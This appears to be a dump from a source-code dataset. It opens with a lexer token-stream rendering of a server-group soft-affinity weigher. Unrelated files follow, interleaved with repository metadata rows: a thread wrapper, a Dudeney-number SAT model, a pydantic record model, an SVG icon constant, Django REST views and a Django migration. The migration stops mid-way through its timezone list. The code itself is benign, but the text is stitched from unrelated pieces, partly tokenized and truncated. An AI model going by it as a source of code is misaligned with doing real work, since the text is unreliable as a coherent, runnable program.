DECL|member|_weigh_object
name|'def'
name|'_weigh_object'
op|'('
name|'self'
op|','
name|'host_state'
op|','
name|'request_spec'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Higher weights win."""'
newline|'\n'
name|'if'
name|'not'
name|'request_spec'
op|'.'
name|'instance_group'
op|':'
newline|'\n'
indent|' '
name|'return'
number|'0'
newline|'\n'
nl|'\n'
dedent|''
name|'policies'
op|'='
name|'request_spec'
op|'.'
name|'instance_group'
op|'.'
name|'policies'
newline|'\n'
nl|'\n'
name|'if'
name|'self'
op|'.'
name|'policy_name'
name|'not'
name|'in'
name|'policies'
op|':'
newline|'\n'
indent|' '
name|'return'
number|'0'
newline|'\n'
nl|'\n'
dedent|''
name|'instances'
op|'='
name|'set'
op|'('
name|'host_state'
op|'.'
name|'instances'
op|'.'
name|'keys'
op|'('
op|')'
op|')'
newline|'\n'
name|'members'
op|'='
name|'set'
op|'('
name|'request_spec'
op|'.'
name|'instance_group'
op|'.'
name|'members'
op|')'
newline|'\n'
name|'member_on_host'
op|'='
name|'instances'
op|'.'
name|'intersection'
op|'('
name|'members'
op|')'
newline|'\n'
nl|'\n'
name|'return'
name|'len'
op|'('
name|'member_on_host'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|ServerGroupSoftAffinityWeigher
dedent|''
dedent|''
name|'class'
name|'ServerGroupSoftAffinityWeigher'
op|'('
name|'_SoftAffinityWeigherBase'
op|')'
op|':'
newline|'\n'
DECL|variable|policy_name
indent|' '
name|'policy_name'
op|'='
string|"'soft-affinity'"
newline|'\n'
DECL|variable|warning_sent
name|'warning_sent'
op|'='
name|'False'
newline|'\n'
nl|'\n'
DECL|member|weight_multiplier
name|'def'
name|'weight_multiplier'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
op|'('
name|'CONF'
op|'.'
name|'soft_affinity_weight_multiplier'
op|'<'
number|'0'
name|'and'
nl|'\n'
name|'not'
name|'self'
op|'.'
name|'warning_sent'
op|')'
op|':'
newline|'\n'
indent|' '
name|'LOG'
op|'.'
name|'warn'
op|'('
name|'_LW'
op|'('
string|"'For the soft_affinity_weight_multiplier only a '"
nl|'\n'
string|"'positive value is meaningful as a negative value '"
nl|'\n'
string|"'would mean that the affinity weigher would '"
nl|'\n'
string|"'prefer non-collocating placement.'"
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'warning_sent'
op|'='
name|'True'
newline|'\n'
nl|'\n'
dedent|''
name|'return'
name|'CONF'
op|'.'
name|'soft_affinity_weight_multiplier'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|ServerGroupSoftAntiAffinityWeigher
dedent|''
dedent|''
name|'class'
name|'ServerGroupSoftAntiAffinityWeigher'
op|'('
name|'_SoftAffinityWeigherBase'
op|')'
op|':'
newline|'\n'
DECL|variable|policy_name
indent|' '
name|'policy_name'
op|'='
string|"'soft-anti-affinity'"
newline|'\n'
DECL|variable|warning_sent
name|'warning_sent'
op|'='
name|'False'
newline|'\n'
nl|'\n'
DECL|member|weight_multiplier
name|'def'
name|'weight_multiplier'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
op|'('
name|'CONF'
op|'.'
name|'soft_anti_affinity_weight_multiplier'
op|'<'
number|'0'
name|'and'
nl|'\n'
name|'not'
name|'self'
op|'.'
name|'warning_sent'
op|')'
op|':'
newline|'\n'
indent|' '
name|'LOG'
op|'.'
name|'warn'
op|'('
name|'_LW'
op|'('
string|"'For the soft_anti_affinity_weight_multiplier only a '"
nl|'\n'
string|"'positive value is meaningful as a negative value '"
nl|'\n'
string|"'would mean that the anti-affinity weigher would '"
nl|'\n'
string|"'prefer collocating placement.'"
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'warning_sent'
op|'='
name|'True'
newline|'\n'
nl|'\n'
dedent|''
name|'return'
name|'CONF'
op|'.'
name|'soft_anti_affinity_weight_multiplier'
newline|'\n'
nl|'\n'
DECL|member|_weigh_object
dedent|''
name|'def'
name|'_weigh_object'
op|'('
name|'self'
op|','
name|'host_state'
op|','
name|'request_spec'
op|')'
op|':'
newline|'\n'
indent|' '
name|'weight'
op|'='
name|'super'
op|'('
name|'ServerGroupSoftAntiAffinityWeigher'
op|','
name|'self'
op|')'
op|'.'
name|'_weigh_object'
op|'('
nl|'\n'
name|'host_state'
op|','
name|'request_spec'
op|')'
newline|'\n'
name|'return'
op|'-'
number|'1'
op|'*'
name|'weight'
newline|'\n'
dedent|''
dedent|''
endmarker|''
end_unit
| 16.161954 | 395 | 0.663273 |
7d853d0fb193fed74ab9e861c4ac08ed533ac101 | 4,303 | py | Python | ondevice/core/thread.py | ondevice/ondevice-client | a291f22827684f192a4f03e6fce3325527f30268 | [
"Linux-OpenIB"
] | 2 | 2016-08-02T15:32:19.000Z | 2016-08-25T08:51:50.000Z | ondevice/core/thread.py | ondevice/ondevice-python | a291f22827684f192a4f03e6fce3325527f30268 | [
"Linux-OpenIB"
] | 29 | 2016-07-08T06:56:06.000Z | 2016-11-09T22:59:44.000Z | ondevice/core/thread.py | ondevice/ondevice-client | a291f22827684f192a4f03e6fce3325527f30268 | [
"Linux-OpenIB"
] | null | null | null | from ondevice.core import state
import logging
import threading
import time
class ThreadInfo:
""" Stores some information on each BackgroundThread instance """
def __init__(self, **kwargs):
for key in 'id,name'.split(','):
if key not in kwargs:
raise KeyError("Missing required ThreadInfo attribute: '{0}' (got: {1})", key, kwargs.keys())
for k,v in kwargs.items():
setattr(self, k, v)
class BackgroundThread():
""" Thin wrapper around threading.Thread with simple event support.
During the lifecycle of a backgrond thread the following events may occur (roughly in that order):
- started: after a call to start()
- running: before target() is being executed
- stopping: after a call to stop()
- finished: after target() has finished
"""
def __init__(self, target, stopFn, name, args=(), kwargs={}):
""" Create a BackgroundThread object
- target: Thread function
- stopFn: Function to gracefully stop the thread function (`target`) - will be called when invoking .stop()
- name: Thread name (doesn't have to be unique)
- args: arguments to pass to target()
- kwargs: keyword arguments to pass to target() """
threadId = state.add('threads', 'seq', 1)
self.info = ThreadInfo(name=name, id=threadId)
self.target = target
self.stopFn = stopFn
self._listeners = {}
self._thread = threading.Thread(target=self.run, name=name, args=args, kwargs=kwargs)
def _emit(self, event, *args, **kwargs):
listeners = list(self._listeners[event]) if event in self._listeners else []
logging.debug("thread {0} fired event: {1} (args={2}, kwargs={3}, {4} listeners)".format(self.target, event, args, kwargs, len(listeners)))
for l in listeners:
l(*args, **kwargs)
def run(self):
""" Runs the target function (don't call this directly unless you want the target function be run in the current thread) """
#
state.add('threads', 'count', 1)
self.info.startedAt = time.time()
state.set('threads.info', self.info.id, self.info.__dict__)
self._emit('running')
try:
self.target()
finally:
self._emit('finished')
state.remove('threads.info', self.info.id)
state.add('threads', 'count', -1)
def addListener(self, event, fn):
if event not in ['started', 'running', 'stopping', 'finished']:
raise KeyError("Unsupported event: '{0}'".format(event))
if not event in self._listeners:
self._listeners[event] = set()
self._listeners[event].add(fn)
def addListenerObject(self, obj):
""" Helper function to bind all signals to predefined methods of `obj` (if they exist)
- mainly used for testing """
fns = {'threadStarted': 'started', 'threadRunning':'running', 'threadStopping':'stopping', 'threadFinished':'finished'}
for fn,event in fns.items():
if hasattr(obj, fn):
self.addListener(event, getattr(obj, fn))
def removeListener(self, event, fn):
if event not in self._listeners:
return # Cant' remove something that isn't there
self._listeners[event].remove(fn)
def start(self):
self._thread.start()
self._emit('started')
def stop(self):
""" call the stopFn passed to the constructor and emit the 'stopping' signal """
self.stopFn()
self._emit('stopping')
class FixedDelayTask(BackgroundThread):
""" Represents a repeating task that runs with a fixed delay (delay)
in a background thread """
def __init__(self, target, interval, name, *args, **kwargs):
self._target = target
self.interval = interval
self.args = args
self.kwargs = kwargs
self._event = threading.Event()
BackgroundThread.__init__(self, self._run, self._stop, name)
def _run(self):
while not self._event.wait(self.interval):
try:
self._target(*self.args, **self.kwargs)
except:
logging.exception('Exception in FixedDelayTask')
def _stop(self):
self._event.set()
| 36.777778 | 147 | 0.614223 |
c196cce761871f87a40c47cbc54baf6c2cdf3c5c | 1,108 | py | Python | examples/Dudeney.py | maxtuno/SATX | 68fc74a2b64c5c59a695724497d3327c47e6d152 | [
"MIT"
] | 4 | 2021-04-09T04:18:17.000Z | 2021-08-04T13:34:54.000Z | examples/Dudeney.py | maxtuno/SATX | 68fc74a2b64c5c59a695724497d3327c47e6d152 | [
"MIT"
] | null | null | null | examples/Dudeney.py | maxtuno/SATX | 68fc74a2b64c5c59a695724497d3327c47e6d152 | [
"MIT"
] | null | null | null | """
See https://en.wikipedia.org/wiki/Dudeney_number
In number theory, a Dudeney number in a given number base b is a natural number
equal to the perfect cube of another natural number such that the digit sum
of the first natural number is equal to the second.
The name derives from Henry Dudeney, who noted the existence of these numbers in one of his puzzles.
There are 5 non trivial numbers for base 10, and the highest such number is formed of 5 digits.
Below, the model is given for base 10.
"""
from math import ceil
import satx
# for base 10
n_digits = 5
satx.engine((10 ** n_digits).bit_length(), cnf_path='aux.cnf')
# n is a (non-trivial) Dudeney number
n = satx.integer()
# s is the perfect cubic root of n
s = satx.integer()
# d[i] is the ith digit of the Dudeney number
d = satx.vector(size=n_digits)
satx.apply_single(d, lambda t: t < 10)
assert 2 <= n < 10 ** n_digits
assert s < ceil((10 ** n_digits) ** (1 / 3)) + 1
assert n == s * s * s
assert sum(d) == s
assert satx.dot(d, [10 ** (n_digits - i - 1) for i in range(n_digits)]) == n
while satx.satisfy('slime'):
print(n, s, d)
| 28.410256 | 100 | 0.702166 |
d4c715129502ceb90a0b93512f4465122a346b53 | 1,469 | py | Python | service/dao/model/job_seeker_answers.py | CyberArkForTheCommunity/jobli-backend | 2309c9ac33993cb89a8e1581630d99b46f8d55aa | [
"MIT"
] | null | null | null | service/dao/model/job_seeker_answers.py | CyberArkForTheCommunity/jobli-backend | 2309c9ac33993cb89a8e1581630d99b46f8d55aa | [
"MIT"
] | 1 | 2021-12-23T13:36:43.000Z | 2021-12-23T13:36:43.000Z | service/dao/model/job_seeker_answers.py | CyberArkForTheCommunity/jobli-backend | 2309c9ac33993cb89a8e1581630d99b46f8d55aa | [
"MIT"
] | null | null | null | from typing import Dict, Optional
from pydantic import BaseModel
from service.dao.single_table_service import DATA_DELIMITER, SingleTableRecord
JOB_SEEKER_ANSWERS_PK = "JOB_SEEKER_ANSWER"
JOB_SEEKER_ANSWERS_SK_PREFIX = "JOB_SEEKER_ID"
class JobSeekerAnswers(BaseModel, SingleTableRecord):
# def __init__(self, **kwargs):
# if 'version' not in kwargs:
# self.version = 0
# for attribute, value in kwargs.items():
# if hasattr(self, attribute):
# setattr(self, attribute, value)
job_seeker_id: str
job_seeker_name: str
a1: Optional[bool]
a2: Optional[bool]
a3: Optional[bool]
a4: Optional[bool]
a5: Optional[bool]
a6: Optional[bool]
a7: Optional[bool]
a8: Optional[bool]
a9: Optional[bool]
a10: Optional[bool]
creationTime: Optional[str]
lastUpdateTime: Optional[str]
version: int = 0
@staticmethod
def build_pk():
return JOB_SEEKER_ANSWERS_PK
@staticmethod
def build_sk(job_seeker_id: str):
return JOB_SEEKER_ANSWERS_SK_PREFIX + DATA_DELIMITER + job_seeker_id
def produce_pk(self) -> str:
return self.build_pk()
def produce_sk(self) -> str:
return self.build_sk(self.job_seeker_id)
def produce_gsi1_pk(self) -> Optional[str]:
return None
def produce_gsi1_sk(self) -> Optional[str]:
return None
def as_dict(self) -> Dict:
return self.__dict__
| 24.483333 | 78 | 0.667801 |
fbccf37b2928c34f99bf023df676379b0df0319c | 318 | py | Python | octicons16px/chevron_up.py | andrewp-as-is/octicons16px.py | 1272dc9f290619d83bd881e87dbd723b0c48844c | [
"Unlicense"
] | 1 | 2021-01-28T06:47:39.000Z | 2021-01-28T06:47:39.000Z | octicons16px/chevron_up.py | andrewp-as-is/octicons16px.py | 1272dc9f290619d83bd881e87dbd723b0c48844c | [
"Unlicense"
] | null | null | null | octicons16px/chevron_up.py | andrewp-as-is/octicons16px.py | 1272dc9f290619d83bd881e87dbd723b0c48844c | [
"Unlicense"
] | null | null | null |
OCTICON_CHEVRON_UP = """
<svg class="octicon octicon-chevron-up" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M3.22 9.78a.75.75 0 010-1.06l4.25-4.25a.75.75 0 011.06 0l4.25 4.25a.75.75 0 01-1.06 1.06L8 6.06 4.28 9.78a.75.75 0 01-1.06 0z"></path></svg>
"""
| 63.6 | 287 | 0.663522 |
98a0eaed0f150065563a1722aa39ccfa19f514ed | 1,495 | py | Python | {{cookiecutter.project_slug}}/usuario/api_views.py | claysllanxavier/django-cookiecutter | 97de7ff4ed3dc94c32bf756a57aee0664a888cbc | [
"BSD-3-Clause"
] | 8 | 2021-08-13T17:48:27.000Z | 2022-02-22T02:34:15.000Z | {{cookiecutter.project_slug}}/usuario/api_views.py | claysllanxavier/django-cookiecutter | 97de7ff4ed3dc94c32bf756a57aee0664a888cbc | [
"BSD-3-Clause"
] | 2 | 2022-03-24T20:39:00.000Z | 2022-03-24T20:39:48.000Z | {{cookiecutter.project_slug}}/usuario/api_views.py | claysllanxavier/django-cookiecutter | 97de7ff4ed3dc94c32bf756a57aee0664a888cbc | [
"BSD-3-Clause"
] | 2 | 2021-09-21T00:05:27.000Z | 2022-01-03T10:50:05.000Z | from drf_jsonmask.views import OptimizedQuerySetMixin
from rest_framework import filters
from rest_framework.viewsets import ModelViewSet, ReadOnlyModelViewSet
from rest_framework.decorators import permission_classes
from rest_framework.permissions import IsAuthenticated
from .serializers import UsuarioSerializer, UsuarioGETSerializer
from .models import Usuario
@permission_classes([IsAuthenticated, ])
class UsuarioViewAPI(ModelViewSet):
""" Classe para gerenciar as requisições da API para os métodos POST, PUT, PATCH e DELETE """
queryset = Usuario.objects.select_related().all()
serializer_class = UsuarioSerializer
@permission_classes([IsAuthenticated, ])
class UsuarioGETAPI(OptimizedQuerySetMixin, ReadOnlyModelViewSet):
""" Classe para gerenciar as requisições da API para o métodos GET
A lista filterset_fields deve ser configurada com os campos do models que poderão ser utilizados para realizar
filtros no models como por exemplo nome_do_campo=valor_a_ser_filtrado
A lista search_fields deve ser configurada com os campos do models que poderão ser utilizados para realizar
buscas no models como por exemplo search=valor_a_ser_pesquisado
"""
queryset = Usuario.objects.select_related().all()
serializer_class = UsuarioGETSerializer
filter_backend = [filters.SearchFilter]
# TODO Configure os parâmetros de filtro (filterset_fields) e buscar (search_fields)
filterset_fields = []
search_fields = []
| 42.714286 | 118 | 0.793311 |
05565ae2653798cde82cc12ea6174e172c4c360c | 25,053 | py | Python | symposion/conference/migrations/0001_initial.py | azkarmoulana/pycon | 931388e6f640c35b892bb4b2d12581ba7ec8cf4e | [
"BSD-3-Clause"
] | 154 | 2015-01-17T02:29:24.000Z | 2022-03-20T20:37:24.000Z | symposion/conference/migrations/0001_initial.py | azkarmoulana/pycon | 931388e6f640c35b892bb4b2d12581ba7ec8cf4e | [
"BSD-3-Clause"
] | 316 | 2015-01-10T04:01:50.000Z | 2020-09-30T20:18:08.000Z | symposion/conference/migrations/0001_initial.py | azkarmoulana/pycon | 931388e6f640c35b892bb4b2d12581ba7ec8cf4e | [
"BSD-3-Clause"
] | 89 | 2015-01-10T05:25:21.000Z | 2022-02-27T03:28:59.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import timezones.fields
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Conference',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=100, verbose_name='title')),
('start_date', models.DateField(null=True, verbose_name='start date', blank=True)),
('end_date', models.DateField(null=True, verbose_name='end date', blank=True)),
('timezone', timezones.fields.TimeZoneField(default=b'US/Eastern', max_length=100, verbose_name='timezone', blank=True, choices=[(b'Pacific/Midway', b'(GMT-1100) Pacific/Midway'), (b'Pacific/Niue', b'(GMT-1100) Pacific/Niue'), (b'Pacific/Pago_Pago', b'(GMT-1100) Pacific/Pago_Pago'), (b'Pacific/Honolulu', b'(GMT-1000) Pacific/Honolulu'), (b'Pacific/Johnston', b'(GMT-1000) Pacific/Johnston'), (b'Pacific/Rarotonga', b'(GMT-1000) Pacific/Rarotonga'), (b'Pacific/Tahiti', b'(GMT-1000) Pacific/Tahiti'), (b'US/Hawaii', b'(GMT-1000) US/Hawaii'), (b'Pacific/Marquesas', b'(GMT-0930) Pacific/Marquesas'), (b'America/Adak', b'(GMT-0900) America/Adak'), (b'Pacific/Gambier', b'(GMT-0900) Pacific/Gambier'), (b'America/Anchorage', b'(GMT-0800) America/Anchorage'), (b'America/Juneau', b'(GMT-0800) America/Juneau'), (b'America/Metlakatla', b'(GMT-0800) America/Metlakatla'), (b'America/Nome', b'(GMT-0800) America/Nome'), (b'America/Sitka', b'(GMT-0800) America/Sitka'), (b'America/Yakutat', b'(GMT-0800) America/Yakutat'), (b'Pacific/Pitcairn', b'(GMT-0800) Pacific/Pitcairn'), (b'US/Alaska', b'(GMT-0800) US/Alaska'), (b'America/Creston', b'(GMT-0700) America/Creston'), (b'America/Dawson', b'(GMT-0700) America/Dawson'), (b'America/Dawson_Creek', b'(GMT-0700) America/Dawson_Creek'), (b'America/Hermosillo', b'(GMT-0700) America/Hermosillo'), (b'America/Los_Angeles', b'(GMT-0700) America/Los_Angeles'), (b'America/Phoenix', b'(GMT-0700) America/Phoenix'), (b'America/Santa_Isabel', b'(GMT-0700) America/Santa_Isabel'), (b'America/Tijuana', b'(GMT-0700) America/Tijuana'), (b'America/Vancouver', b'(GMT-0700) America/Vancouver'), (b'America/Whitehorse', b'(GMT-0700) America/Whitehorse'), (b'Canada/Pacific', b'(GMT-0700) Canada/Pacific'), (b'US/Arizona', b'(GMT-0700) US/Arizona'), (b'US/Pacific', b'(GMT-0700) US/Pacific'), (b'America/Belize', b'(GMT-0600) America/Belize'), (b'America/Boise', b'(GMT-0600) America/Boise'), (b'America/Cambridge_Bay', b'(GMT-0600) America/Cambridge_Bay'), (b'America/Chihuahua', b'(GMT-0600) America/Chihuahua'), (b'America/Costa_Rica', b'(GMT-0600) America/Costa_Rica'), (b'America/Denver', b'(GMT-0600) America/Denver'), (b'America/Edmonton', b'(GMT-0600) America/Edmonton'), (b'America/El_Salvador', b'(GMT-0600) America/El_Salvador'), (b'America/Guatemala', b'(GMT-0600) America/Guatemala'), (b'America/Inuvik', b'(GMT-0600) America/Inuvik'), (b'America/Managua', b'(GMT-0600) America/Managua'), (b'America/Mazatlan', b'(GMT-0600) America/Mazatlan'), (b'America/Ojinaga', b'(GMT-0600) America/Ojinaga'), (b'America/Regina', b'(GMT-0600) America/Regina'), (b'America/Swift_Current', b'(GMT-0600) America/Swift_Current'), (b'America/Tegucigalpa', b'(GMT-0600) America/Tegucigalpa'), (b'America/Yellowknife', b'(GMT-0600) America/Yellowknife'), (b'Canada/Mountain', b'(GMT-0600) Canada/Mountain'), (b'Pacific/Galapagos', b'(GMT-0600) Pacific/Galapagos'), (b'US/Mountain', b'(GMT-0600) US/Mountain'), (b'America/Atikokan', b'(GMT-0500) America/Atikokan'), (b'America/Bahia_Banderas', b'(GMT-0500) America/Bahia_Banderas'), (b'America/Bogota', b'(GMT-0500) America/Bogota'), (b'America/Cancun', b'(GMT-0500) America/Cancun'), (b'America/Cayman', b'(GMT-0500) America/Cayman'), (b'America/Chicago', b'(GMT-0500) America/Chicago'), (b'America/Eirunepe', b'(GMT-0500) America/Eirunepe'), (b'America/Guayaquil', b'(GMT-0500) America/Guayaquil'), (b'America/Indiana/Knox', b'(GMT-0500) America/Indiana/Knox'), (b'America/Indiana/Tell_City', b'(GMT-0500) America/Indiana/Tell_City'), (b'America/Jamaica', b'(GMT-0500) America/Jamaica'), (b'America/Lima', b'(GMT-0500) America/Lima'), (b'America/Matamoros', b'(GMT-0500) America/Matamoros'), (b'America/Menominee', b'(GMT-0500) America/Menominee'), (b'America/Merida', b'(GMT-0500) America/Merida'), (b'America/Mexico_City', b'(GMT-0500) America/Mexico_City'), (b'America/Monterrey', b'(GMT-0500) America/Monterrey'), (b'America/North_Dakota/Beulah', b'(GMT-0500) America/North_Dakota/Beulah'), (b'America/North_Dakota/Center', b'(GMT-0500) America/North_Dakota/Center'), (b'America/North_Dakota/New_Salem', b'(GMT-0500) America/North_Dakota/New_Salem'), (b'America/Panama', b'(GMT-0500) America/Panama'), (b'America/Rainy_River', b'(GMT-0500) America/Rainy_River'), (b'America/Rankin_Inlet', b'(GMT-0500) America/Rankin_Inlet'), (b'America/Resolute', b'(GMT-0500) America/Resolute'), (b'America/Rio_Branco', b'(GMT-0500) America/Rio_Branco'), (b'America/Winnipeg', b'(GMT-0500) America/Winnipeg'), (b'Canada/Central', b'(GMT-0500) Canada/Central'), (b'Pacific/Easter', b'(GMT-0500) Pacific/Easter'), (b'US/Central', b'(GMT-0500) US/Central'), (b'America/Caracas', b'(GMT-0430) America/Caracas'), (b'America/Anguilla', b'(GMT-0400) America/Anguilla'), (b'America/Antigua', b'(GMT-0400) America/Antigua'), (b'America/Aruba', b'(GMT-0400) America/Aruba'), (b'America/Asuncion', b'(GMT-0400) America/Asuncion'), (b'America/Barbados', b'(GMT-0400) America/Barbados'), (b'America/Blanc-Sablon', b'(GMT-0400) America/Blanc-Sablon'), (b'America/Boa_Vista', b'(GMT-0400) America/Boa_Vista'), (b'America/Campo_Grande', b'(GMT-0400) America/Campo_Grande'), (b'America/Cuiaba', b'(GMT-0400) America/Cuiaba'), (b'America/Curacao', b'(GMT-0400) America/Curacao'), (b'America/Detroit', b'(GMT-0400) America/Detroit'), (b'America/Dominica', b'(GMT-0400) America/Dominica'), (b'America/Grand_Turk', b'(GMT-0400) America/Grand_Turk'), (b'America/Grenada', b'(GMT-0400) America/Grenada'), (b'America/Guadeloupe', b'(GMT-0400) America/Guadeloupe'), (b'America/Guyana', b'(GMT-0400) America/Guyana'), (b'America/Havana', b'(GMT-0400) America/Havana'), (b'America/Indiana/Indianapolis', b'(GMT-0400) America/Indiana/Indianapolis'), (b'America/Indiana/Marengo', b'(GMT-0400) America/Indiana/Marengo'), (b'America/Indiana/Petersburg', b'(GMT-0400) America/Indiana/Petersburg'), (b'America/Indiana/Vevay', b'(GMT-0400) America/Indiana/Vevay'), (b'America/Indiana/Vincennes', b'(GMT-0400) America/Indiana/Vincennes'), (b'America/Indiana/Winamac', b'(GMT-0400) America/Indiana/Winamac'), (b'America/Iqaluit', b'(GMT-0400) America/Iqaluit'), (b'America/Kentucky/Louisville', b'(GMT-0400) America/Kentucky/Louisville'), (b'America/Kentucky/Monticello', b'(GMT-0400) America/Kentucky/Monticello'), (b'America/Kralendijk', b'(GMT-0400) America/Kralendijk'), (b'America/La_Paz', b'(GMT-0400) America/La_Paz'), (b'America/Lower_Princes', b'(GMT-0400) America/Lower_Princes'), (b'America/Manaus', b'(GMT-0400) America/Manaus'), (b'America/Marigot', b'(GMT-0400) America/Marigot'), (b'America/Martinique', b'(GMT-0400) America/Martinique'), (b'America/Montserrat', b'(GMT-0400) America/Montserrat'), (b'America/Nassau', b'(GMT-0400) America/Nassau'), (b'America/New_York', b'(GMT-0400) America/New_York'), (b'America/Nipigon', b'(GMT-0400) America/Nipigon'), (b'America/Pangnirtung', b'(GMT-0400) America/Pangnirtung'), (b'America/Port-au-Prince', b'(GMT-0400) America/Port-au-Prince'), (b'America/Port_of_Spain', b'(GMT-0400) America/Port_of_Spain'), (b'America/Porto_Velho', b'(GMT-0400) America/Porto_Velho'), (b'America/Puerto_Rico', b'(GMT-0400) America/Puerto_Rico'), (b'America/Santo_Domingo', b'(GMT-0400) America/Santo_Domingo'), (b'America/St_Barthelemy', b'(GMT-0400) America/St_Barthelemy'), (b'America/St_Kitts', b'(GMT-0400) America/St_Kitts'), (b'America/St_Lucia', b'(GMT-0400) America/St_Lucia'), (b'America/St_Thomas', b'(GMT-0400) America/St_Thomas'), (b'America/St_Vincent', b'(GMT-0400) America/St_Vincent'), (b'America/Thunder_Bay', b'(GMT-0400) America/Thunder_Bay'), (b'America/Toronto', b'(GMT-0400) America/Toronto'), (b'America/Tortola', b'(GMT-0400) America/Tortola'), (b'Canada/Eastern', b'(GMT-0400) Canada/Eastern'), (b'US/Eastern', b'(GMT-0400) US/Eastern'), (b'America/Araguaina', b'(GMT-0300) America/Araguaina'), (b'America/Argentina/Buenos_Aires', b'(GMT-0300) America/Argentina/Buenos_Aires'), (b'America/Argentina/Catamarca', b'(GMT-0300) America/Argentina/Catamarca'), (b'America/Argentina/Cordoba', b'(GMT-0300) America/Argentina/Cordoba'), (b'America/Argentina/Jujuy', b'(GMT-0300) America/Argentina/Jujuy'), (b'America/Argentina/La_Rioja', b'(GMT-0300) America/Argentina/La_Rioja'), (b'America/Argentina/Mendoza', b'(GMT-0300) America/Argentina/Mendoza'), (b'America/Argentina/Rio_Gallegos', b'(GMT-0300) America/Argentina/Rio_Gallegos'), (b'America/Argentina/Salta', b'(GMT-0300) America/Argentina/Salta'), (b'America/Argentina/San_Juan', b'(GMT-0300) America/Argentina/San_Juan'), (b'America/Argentina/San_Luis', b'(GMT-0300) America/Argentina/San_Luis'), (b'America/Argentina/Tucuman', b'(GMT-0300) America/Argentina/Tucuman'), (b'America/Argentina/Ushuaia', b'(GMT-0300) America/Argentina/Ushuaia'), (b'America/Bahia', b'(GMT-0300) America/Bahia'), (b'America/Belem', b'(GMT-0300) America/Belem'), (b'America/Cayenne', b'(GMT-0300) America/Cayenne'), (b'America/Fortaleza', b'(GMT-0300) America/Fortaleza'), (b'America/Glace_Bay', b'(GMT-0300) America/Glace_Bay'), (b'America/Goose_Bay', b'(GMT-0300) America/Goose_Bay'), (b'America/Halifax', b'(GMT-0300) America/Halifax'), (b'America/Maceio', b'(GMT-0300) America/Maceio'), (b'America/Moncton', b'(GMT-0300) America/Moncton'), (b'America/Montevideo', b'(GMT-0300) America/Montevideo'), (b'America/Paramaribo', b'(GMT-0300) America/Paramaribo'), (b'America/Recife', b'(GMT-0300) America/Recife'), (b'America/Santarem', b'(GMT-0300) America/Santarem'), (b'America/Santiago', b'(GMT-0300) America/Santiago'), (b'America/Sao_Paulo', b'(GMT-0300) America/Sao_Paulo'), (b'America/Thule', b'(GMT-0300) America/Thule'), (b'Antarctica/Palmer', b'(GMT-0300) Antarctica/Palmer'), (b'Antarctica/Rothera', b'(GMT-0300) Antarctica/Rothera'), (b'Atlantic/Bermuda', b'(GMT-0300) Atlantic/Bermuda'), (b'Atlantic/Stanley', b'(GMT-0300) Atlantic/Stanley'), (b'Canada/Atlantic', b'(GMT-0300) Canada/Atlantic'), (b'America/St_Johns', b'(GMT-0230) America/St_Johns'), (b'Canada/Newfoundland', b'(GMT-0230) Canada/Newfoundland'), (b'America/Godthab', b'(GMT-0200) America/Godthab'), (b'America/Miquelon', b'(GMT-0200) America/Miquelon'), (b'America/Noronha', b'(GMT-0200) America/Noronha'), (b'Atlantic/South_Georgia', b'(GMT-0200) Atlantic/South_Georgia'), (b'Atlantic/Cape_Verde', b'(GMT-0100) Atlantic/Cape_Verde'), (b'Africa/Abidjan', b'(GMT+0000) Africa/Abidjan'), (b'Africa/Accra', b'(GMT+0000) Africa/Accra'), (b'Africa/Bamako', b'(GMT+0000) Africa/Bamako'), (b'Africa/Banjul', b'(GMT+0000) Africa/Banjul'), (b'Africa/Bissau', b'(GMT+0000) Africa/Bissau'), (b'Africa/Casablanca', b'(GMT+0000) Africa/Casablanca'), (b'Africa/Conakry', b'(GMT+0000) Africa/Conakry'), (b'Africa/Dakar', b'(GMT+0000) Africa/Dakar'), (b'Africa/El_Aaiun', b'(GMT+0000) Africa/El_Aaiun'), (b'Africa/Freetown', b'(GMT+0000) Africa/Freetown'), (b'Africa/Lome', b'(GMT+0000) Africa/Lome'), (b'Africa/Monrovia', b'(GMT+0000) Africa/Monrovia'), (b'Africa/Nouakchott', b'(GMT+0000) Africa/Nouakchott'), (b'Africa/Ouagadougou', b'(GMT+0000) Africa/Ouagadougou'), (b'Africa/Sao_Tome', b'(GMT+0000) Africa/Sao_Tome'), (b'America/Danmarkshavn', b'(GMT+0000) America/Danmarkshavn'), (b'America/Scoresbysund', b'(GMT+0000) America/Scoresbysund'), (b'Atlantic/Azores', b'(GMT+0000) Atlantic/Azores'), (b'Atlantic/Reykjavik', b'(GMT+0000) Atlantic/Reykjavik'), (b'Atlantic/St_Helena', b'(GMT+0000) Atlantic/St_Helena'), (b'GMT', b'(GMT+0000) GMT'), (b'UTC', b'(GMT+0000) UTC'), (b'Africa/Algiers', b'(GMT+0100) Africa/Algiers'), (b'Africa/Bangui', b'(GMT+0100) Africa/Bangui'), (b'Africa/Brazzaville', b'(GMT+0100) Africa/Brazzaville'), (b'Africa/Douala', b'(GMT+0100) Africa/Douala'), (b'Africa/Kinshasa', b'(GMT+0100) Africa/Kinshasa'), (b'Africa/Lagos', b'(GMT+0100) Africa/Lagos'), (b'Africa/Libreville', b'(GMT+0100) Africa/Libreville'), (b'Africa/Luanda', b'(GMT+0100) Africa/Luanda'), (b'Africa/Malabo', b'(GMT+0100) Africa/Malabo'), (b'Africa/Ndjamena', b'(GMT+0100) Africa/Ndjamena'), (b'Africa/Niamey', b'(GMT+0100) Africa/Niamey'), (b'Africa/Porto-Novo', b'(GMT+0100) Africa/Porto-Novo'), (b'Africa/Tunis', b'(GMT+0100) Africa/Tunis'), (b'Africa/Windhoek', b'(GMT+0100) Africa/Windhoek'), (b'Atlantic/Canary', b'(GMT+0100) Atlantic/Canary'), (b'Atlantic/Faroe', b'(GMT+0100) Atlantic/Faroe'), (b'Atlantic/Madeira', b'(GMT+0100) 